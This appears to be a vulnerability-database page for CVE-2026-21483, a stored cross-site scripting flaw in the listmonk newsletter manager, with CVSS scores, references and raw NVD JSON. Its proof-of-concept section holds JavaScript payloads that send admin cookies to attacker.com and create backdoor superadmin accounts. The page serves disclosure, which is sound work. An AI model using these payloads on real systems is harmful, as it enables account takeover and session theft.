CVE-2026-21483

Description

listmonk is a standalone, self-hosted, newsletter and mailing list manager. Prior to version 6.0.0, lower-privileged user with campaign management permissions can inject malicious JavaScript into campaigns or templates. When a higher-privileged user (Super Admin) views or previews this content, the XSS executes in their browser context, allowing the attacker to perform privileged actions such as creating backdoor admin accounts. The attack can be weaponized via the public archive feature, where victims simply need to visit a link - no preview click required. Version 6.0.0 fixes the issue.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:nadh:listmonk:*:*:*:*:*:*:*:* - VULNERABLE

listmonk < 6.0.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<script> // Steal admin session cookies fetch('https://attacker.com/steal?c=' + encodeURIComponent(document.cookie)); // Create backdoor admin account fetch('/api/admin/users', { method: 'POST', headers: { 'Content-Type': 'application/json', 'Cookie': document.cookie }, body: JSON.stringify({ name: 'BackdoorAdmin', email: '[email protected]', password: 'P@ssw0rd123', role: 'superadmin' }) }); </script>  <img src=x onerror="fetch('/api/admin/users', {method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({name: 'Hacker', email: '[email protected]', password: 'hacked123', role: 'superadmin'})})">

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-21483
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-21483
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-21483/
[4] VulDB https://vuldb.com/cve/CVE-2026-21483
[5] https://github.com/knadh/listmonk/security/advisories/GHSA-jmr4-p576-v565

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-21483", "sourceIdentifier": "[email protected]", "published": "2026-01-02T21:16:03.217", "lastModified": "2026-02-25T15:20:58.083", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "listmonk is a standalone, self-hosted, newsletter and mailing list manager. Prior to version 6.0.0, lower-privileged user with campaign management permissions can inject malicious JavaScript into campaigns or templates. When a higher-privileged user (Super Admin) views or previews this content, the XSS executes in their browser context, allowing the attacker to perform privileged actions such as creating backdoor admin accounts. The attack can be weaponized via the public archive feature, where victims simply need to visit a link - no preview click required. Version 6.0.0 fixes the issue."}, {"lang": "es", "value": "listmonk es un gestor de boletines y listas de correo autónomo y autoalojado. Antes de la versión 6.0.0, un usuario con privilegios inferiores y permisos de gestión de campañas puede inyectar JavaScript malicioso en campañas o plantillas. Cuando un usuario con privilegios superiores (Super Admin) ve o previsualiza este contenido, el XSS se ejecuta en el contexto de su navegador, permitiendo al atacante realizar acciones privilegiadas como crear cuentas de administrador con puerta trasera. El ataque puede ser instrumentalizado a través de la función de archivo público, donde las víctimas simplemente necesitan visitar un enlace - no se requiere hacer clic en la previsualización. La versión 6.0.0 corrige el problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nadh:listmonk:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.0.0", "matchCriteriaId": "41CE03AA-115A-4370-B761-5684D5882B63"}]}]}], "references": [{"url": "https://github.com/knadh/listmonk/security/advisories/GHSA-jmr4-p576-v565", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}